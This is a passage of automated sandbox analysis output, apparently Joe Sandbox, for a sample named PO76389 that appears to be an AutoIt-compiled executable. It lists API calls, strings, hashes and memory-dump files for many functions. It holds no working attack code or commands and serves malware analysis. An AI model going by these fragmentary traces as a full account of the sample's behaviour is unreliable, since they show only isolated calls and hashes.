                                                    • Opcode ID: dc00246a21cb7991b7e18ac65f6928b281a8ede42d8d430574c629c6645df030
                                                    • Instruction ID: 0787b1c2e98ffb1a33dbfd1d8198f348af717c7167e01faab2f59e78c2d2e10e
                                                    • Opcode Fuzzy Hash: dc00246a21cb7991b7e18ac65f6928b281a8ede42d8d430574c629c6645df030
                                                    • Instruction Fuzzy Hash: 7EF0307A200004ABCB016F55EC85A5ABB39EF45314B04C066FE085E217C735A825DBB5
                                                    APIs
                                                      • Part of subcall function 004CB58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 004CB5EB
                                                      • Part of subcall function 004CB58B: SelectObject.GDI32(?,00000000), ref: 004CB5FA
                                                      • Part of subcall function 004CB58B: BeginPath.GDI32(?), ref: 004CB611
                                                      • Part of subcall function 004CB58B: SelectObject.GDI32(?,00000000), ref: 004CB63B
                                                    • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0051E860
                                                    • LineTo.GDI32(00000000,?,?), ref: 0051E86D
                                                    • EndPath.GDI32(00000000), ref: 0051E87D
                                                    • StrokePath.GDI32(00000000), ref: 0051E88B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                    • String ID:
                                                    • API String ID: 1539411459-0
                                                    • Opcode ID: 7886cd0e1d7056d182e2d376d521bfef044590daec97b9b6219b1f52a04437e1
                                                    • Instruction ID: af1978f4062d5262f43aa7905824250c6f5f1bcc01e4dd7507ce0047429c4178
                                                    • Opcode Fuzzy Hash: 7886cd0e1d7056d182e2d376d521bfef044590daec97b9b6219b1f52a04437e1
                                                    • Instruction Fuzzy Hash: 0FF0BE31000659BBDB161F54BC0EFCA3FB9AF16710F008141FE01211E1837946A9EFA9
                                                    APIs
                                                    • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 004ED640
                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 004ED653
                                                    • GetCurrentThreadId.KERNEL32 ref: 004ED65A
                                                    • AttachThreadInput.USER32(00000000), ref: 004ED661
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                    • String ID:
                                                    • API String ID: 2710830443-0
                                                    • Opcode ID: eb5bca6675448581161b8fcd26c34ac3a6fe07bb318157c41a05a28158ef1142
                                                    • Instruction ID: 62b08af9db4e12219062c03b2e4f8af38cb4f0e7daa4c6eda44705339d49c0f6
                                                    • Opcode Fuzzy Hash: eb5bca6675448581161b8fcd26c34ac3a6fe07bb318157c41a05a28158ef1142
                                                    • Instruction Fuzzy Hash: 23E06D31501268BBDB201FB2EC0EEEB7F3CEF217A2F008011B51D85160CAB59594DBB4
                                                    APIs
                                                    • GetSysColor.USER32(00000008), ref: 004CB0C5
                                                    • SetTextColor.GDI32(?,000000FF), ref: 004CB0CF
                                                    • SetBkMode.GDI32(?,00000001), ref: 004CB0E4
                                                    • GetStockObject.GDI32(00000005), ref: 004CB0EC
                                                    • GetWindowDC.USER32(?,00000000), ref: 0052ECFA
                                                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 0052ED07
                                                    • GetPixel.GDI32(00000000,?,00000000), ref: 0052ED20
                                                    • GetPixel.GDI32(00000000,00000000,?), ref: 0052ED39
                                                    • GetPixel.GDI32(00000000,?,?), ref: 0052ED59
                                                    • ReleaseDC.USER32(?,00000000), ref: 0052ED64
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                    • String ID:
                                                    • API String ID: 1946975507-0
                                                    • Opcode ID: 67098c7702527913cf510124f0dc0adc2025900caa7d7ff18a7fdbb1f76cf9c6
                                                    • Instruction ID: 3b1b4582cd4160b63c42acae9edd2479d7d5446eeb08cfca9cc93e3937dee164
                                                    • Opcode Fuzzy Hash: 67098c7702527913cf510124f0dc0adc2025900caa7d7ff18a7fdbb1f76cf9c6
                                                    • Instruction Fuzzy Hash: 42E0ED31504240AFEB215F74BC4ABD93F31AB66336F14826AF669581E2C7724954EB21
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                    • String ID:
                                                    • API String ID: 2889604237-0
                                                    • Opcode ID: 0f893c36d44af10f7ec6619579d37df7867d08d3cdcaab36bb856ca0b75dac87
                                                    • Instruction ID: 6e725e31c197169e90fae7b12c6e1954b44813c224d16d997f2698548bf51c9b
                                                    • Opcode Fuzzy Hash: 0f893c36d44af10f7ec6619579d37df7867d08d3cdcaab36bb856ca0b75dac87
                                                    • Instruction Fuzzy Hash: E8E01AB5500210EFDB005F71A84DA693FB5EB58350F11840AF85A87351DAB89985AB64
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                    • String ID:
                                                    • API String ID: 2889604237-0
                                                    • Opcode ID: 51412a3aa513552835a8d638b3a022b3ab3f8022260e14d45934618501290b86
                                                    • Instruction ID: 1ff22da6df17c847a2f3b13784d86678bd1a29f8a7ed72a744fb3303827c5dff
                                                    • Opcode Fuzzy Hash: 51412a3aa513552835a8d638b3a022b3ab3f8022260e14d45934618501290b86
                                                    • Instruction Fuzzy Hash: A5E046B9500200EFDB005F71EC4DA693BB9EB5C360F11840AF95A8B310DBB89985AB64
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID: >$DEFINE
                                                    • API String ID: 4104443479-1664449232
                                                    • Opcode ID: 0acffda7807c671b9d86241ccfdae4fb34e7b1c789a6d04d30ed40833a383a9b
                                                    • Instruction ID: 58e519e359d78b441a91f263b6fe08d150af4a8d0d33529ccac4baa79a94c419
                                                    • Opcode Fuzzy Hash: 0acffda7807c671b9d86241ccfdae4fb34e7b1c789a6d04d30ed40833a383a9b
                                                    • Instruction Fuzzy Hash: 46124B75A0060ADFCF24CF98C490AEDBBB1FF58310F25855AE859AB351D734AE81CB94
                                                    APIs
                                                    • OleSetContainedObject.OLE32(?,00000001), ref: 004EECA0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: ContainedObject
                                                    • String ID: AutoIt3GUI$Container
                                                    • API String ID: 3565006973-3941886329
                                                    • Opcode ID: 8f8857763cb97ff725330b37416b4e7cf353cd91c13169a53bb02e745ae6c4a0
                                                    • Instruction ID: d93b2b7386716bd0673371752b52bce42f15c5f8cc3f6f5623ffc0872224e64e
                                                    • Opcode Fuzzy Hash: 8f8857763cb97ff725330b37416b4e7cf353cd91c13169a53bb02e745ae6c4a0
                                                    • Instruction Fuzzy Hash: 9A913770600602AFDB14CF66C884B6ABBF5BF48711F24856EF94ACB391DB75E841CB64
                                                    APIs
                                                      • Part of subcall function 004B3BCF: _wcscpy.LIBCMT ref: 004B3BF2
                                                      • Part of subcall function 004B84A6: __swprintf.LIBCMT ref: 004B84E5
                                                      • Part of subcall function 004B84A6: __itow.LIBCMT ref: 004B8519
                                                    • __wcsnicmp.LIBCMT ref: 004FE785
                                                    • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 004FE84E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                    • String ID: LPT
                                                    • API String ID: 3222508074-1350329615
                                                    • Opcode ID: 1eba0739a656a7820635f6b126cb628fa80e7cd4b1cd5a887a00b6f850b9d586
                                                    • Instruction ID: 2e94857dbd1719972605aeeba7efc918bf56a6169e1375c389f0c1ce2030878d
                                                    • Opcode Fuzzy Hash: 1eba0739a656a7820635f6b126cb628fa80e7cd4b1cd5a887a00b6f850b9d586
                                                    • Instruction Fuzzy Hash: 9C616175A00219AFCB14EB55C891EBEB7F4AF48310F00406EF606AB3A1DB78AE45CB55
                                                    APIs
                                                    • Sleep.KERNEL32(00000000), ref: 004B1B83
                                                    • GlobalMemoryStatusEx.KERNEL32 ref: 004B1B9C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: GlobalMemorySleepStatus
                                                    • String ID: @
                                                    • API String ID: 2783356886-2766056989
                                                    • Opcode ID: 892a91aea83e9f226029ee1c89f62db3d3e1a19bf2a2f73614bb8fc3f4b62bed
                                                    • Instruction ID: 348570ff887e0ad766ae4fc1b8b53849191e3c46c76df4d6672f9269889c155b
                                                    • Opcode Fuzzy Hash: 892a91aea83e9f226029ee1c89f62db3d3e1a19bf2a2f73614bb8fc3f4b62bed
                                                    • Instruction Fuzzy Hash: EB515971408744ABE360AF25D885FABBBE8FF98354F41484DF5C8410A2EFB5856CC76A
                                                    APIs
                                                      • Part of subcall function 004B417D: __fread_nolock.LIBCMT ref: 004B419B
                                                    • _wcscmp.LIBCMT ref: 004FCF49
                                                    • _wcscmp.LIBCMT ref: 004FCF5C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: _wcscmp$__fread_nolock
                                                    • String ID: FILE
                                                    • API String ID: 4029003684-3121273764
                                                    • Opcode ID: 4ac98a7750787fa9139d01f7ceed9dfbe015a695e311ff8b54887700a21c3950
                                                    • Instruction ID: 0aa6eb66a3ac471882229a4fd6ab9166df3b66e5781b364c4a7577b84fd4d8e3
                                                    • Opcode Fuzzy Hash: 4ac98a7750787fa9139d01f7ceed9dfbe015a695e311ff8b54887700a21c3950
                                                    • Instruction Fuzzy Hash: D541E532A0021DBADF10DBA5CC85FEFBBB9AF89714F00046EF601A7181D7759A448B69
                                                    APIs
                                                      • Part of subcall function 004D889E: __getptd_noexit.LIBCMT ref: 004D889E
                                                    • __getbuf.LIBCMT ref: 004D9B8A
                                                    • __lseeki64.LIBCMT ref: 004D9BFA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: __getbuf__getptd_noexit__lseeki64
                                                    • String ID: pMN
                                                    • API String ID: 3311320906-2130963613
                                                    • Opcode ID: fb48e36ba5fe7d7c044a636ae9500b257416d4d4d2d19c1c37b326bd29f7240a
                                                    • Instruction ID: 1cbfb9cb814e982428d3eaf1433458556e0a2abdfd0fe2dbdfc88d102f5fd7cd
                                                    • Opcode Fuzzy Hash: fb48e36ba5fe7d7c044a636ae9500b257416d4d4d2d19c1c37b326bd29f7240a
                                                    • Instruction Fuzzy Hash: 07412E71500B059ED7349B29D8B1A7B7BE4AB42320F04861FE4AACB3D1E77CEC418B19
                                                    APIs
                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 0051A668
                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0051A67D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID: '
                                                    • API String ID: 3850602802-1997036262
                                                    • Opcode ID: cbe4e685e30cc7fb3f38beb8236185244d1992b7b9622475b94d38a7ead8d815
                                                    • Instruction ID: d8d01ba99602949771ea763aeee4e61195e4251c2c070d44a396fa490d120bc1
                                                    • Opcode Fuzzy Hash: cbe4e685e30cc7fb3f38beb8236185244d1992b7b9622475b94d38a7ead8d815
                                                    • Instruction Fuzzy Hash: 6F411475A013099FEF15CFA8D880BDA7BB5FB08300F15046AE919EB381D770A985DFA1
                                                    APIs
                                                    • DestroyWindow.USER32(?,?,?,?), ref: 0051961B
                                                    • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00519657
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: Window$DestroyMove
                                                    • String ID: static
                                                    • API String ID: 2139405536-2160076837
                                                    • Opcode ID: fa1f5145f64e373396c2325d3841eaecb1fdb115ee1924b78121f50756903d3b
                                                    • Instruction ID: 59e327e739370cef72a18ce1d1652c9a9ab15f2af8c0c15890f54a8499a9e6bb
                                                    • Opcode Fuzzy Hash: fa1f5145f64e373396c2325d3841eaecb1fdb115ee1924b78121f50756903d3b
                                                    • Instruction Fuzzy Hash: 0E31AD31100604AEEB109F64DC91FFB7BB9FF58764F008619F8A9C7190CA30AC91DB64
                                                    APIs
                                                    • _memset.LIBCMT ref: 004F5BE4
                                                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 004F5C1F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: InfoItemMenu_memset
                                                    • String ID: 0
                                                    • API String ID: 2223754486-4108050209
                                                    • Opcode ID: e5cfed0b9f4b28f7fe155a52562614ca90094bb742465913293c20cc9a83826e
                                                    • Instruction ID: 537aae4a87b9d8314851fb48e2e8dbc38b530534c1784c02959ac1e22b53897b
                                                    • Opcode Fuzzy Hash: e5cfed0b9f4b28f7fe155a52562614ca90094bb742465913293c20cc9a83826e
                                                    • Instruction Fuzzy Hash: DF31D43160074DABDB248F99D885BBEBBF4AF06350F18001BEB86962A0D7789A44DB55
                                                    APIs
                                                    • __snwprintf.LIBCMT ref: 00506BDD
                                                      • Part of subcall function 004BCAEE: _memmove.LIBCMT ref: 004BCB2F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000057A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.00000000005E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096634093.00000000005EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096647771.00000000005EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_4b0000_PO76389.jbxd
                                                    Similarity
                                                    • API ID: __snwprintf_memmove
                                                    • String ID: , $$AUTOITCALLVARIABLE%d
                                                    • API String ID: 3506404897-2584243854
                                                    • Opcode ID: bac1237c3865fafced97e6ffeefd4cc70cb2ffcb0a4af99f20da700f17dfb0cc
                                                    • Instruction ID: 6fa9dff6919a5cc677bb218059d68f63a330637b474f1bdc53337b0e13c2da55
                                                    • Opcode Fuzzy Hash: bac1237c3865fafced97e6ffeefd4cc70cb2ffcb0a4af99f20da700f17dfb0cc
                                                    • Instruction Fuzzy Hash: B3218D71600219AACF10EFA5C882EEE7BB5FF44704F00485AF505AB182DB75EE56CBB5
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00519269
                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00519274
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2096479232.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                    • Associated: 00000000.00000002.2096465302.00000000004B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2096479232.000000000056A000.00000040.00000001.01000000.00000003.sdmpDownload File
